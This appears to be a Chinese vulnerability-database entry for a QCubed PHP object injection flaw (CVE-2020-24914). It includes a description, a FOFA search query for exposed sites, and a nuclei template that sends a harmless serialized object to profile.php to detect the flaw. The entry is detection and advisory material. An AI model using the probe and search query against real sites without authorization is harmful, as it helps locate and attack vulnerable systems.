漏洞信息
漏洞名称: QCubed PHP Object Injection Vulnerability
漏洞编号:
漏洞类型: 反序列化
漏洞等级: 严重
漏洞描述: QCubed是一个PHP框架,用于快速开发数据库驱动的Web应用程序。它广泛应用于各种Web开发项目中,提供了一个丰富的组件库和工具集,以支持开发者的高效工作。该框架的典型部署场景包括企业级服务和常见的Web应用组件。
该漏洞属于反序列化类型,技术根源在于QCubed框架的profile.php文件中,未对用户提供的POST数据进行适当的验证和过滤,直接进行了反序列化操作。这使得未经认证的攻击者能够通过构造恶意的POST请求,注入任意的PHP对象,从而导致远程代码执行。
此漏洞的安全风险极高,因为它允许攻击者在无需任何认证的情况下,远程执行任意代码,完全控制受影响的系统。攻击者可以利用此漏洞窃取敏感数据、破坏服务稳定性或进一步渗透内网。由于漏洞的利用方式简单且可以自动化,因此对所有使用受影响版本的QCubed框架的网站构成了严重威胁。
产品厂商: QCubed
产品名称: QCubed
影响版本: 3.1.1 and all versions
搜索语法: title=”QCubed” || body=”qcubed”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/3c17057536e061b7c152e41c99d042917d33656f/http%2Fvulnerabilities%2Fphp%2Fqcubed-php-object-injection.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
|
id: qcubed-php-object-injection
info:
name: QCubed PHP Object Injection (CVE-2020-24914)
author: pranjal
severity: critical
description: |
QCubed 3.1.1 and all versions contain a PHP object injection caused by unserializing untrusted POST data in profile.php,
letting unauthenticated attackers execute arbitrary code via crafted POST requests.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24914
- http://seclists.org/fulldisclosure/2021/Mar/28
- https://tech.feedyourhead.at/content/QCubed-PHP-Object-Injection-CVE-2020-24914
- https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-01
classification:
cwe-id: CWE-502
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
metadata:
max-request: 2
product: QCubed
fofa-query: title="QCubed" || body="qcubed"
tags: cve,cve2020,qcubed,php,object-injection,rce,kev
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
matchers:
- type: dsl
dsl:
- 'status_code==200'
- 'contains(tolower(body), "qcubed") || contains(tolower(body), "qform")'
condition: and
internal: true
- raw:
- |
POST /profile.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
data=O:8:"stdClass":1:{s:4:"test";s:10:"{{randstr}}";}&action=save&id=1
matchers-condition: and
matchers:
- type: word
part: body
words:
- "stdClass"
- "{{randstr}}"
- type: status
status:
- 200
- type: dsl
dsl:
- 'contains(body, "stdClass")'
- 'contains(body, "{{randstr}}")'
condition: and
extractors:
- type: regex
part: body
regex:
- 'O:8:"stdClass":1:\{s:4:"test";s:\d+:"[^"]+";\}'
internal: true
|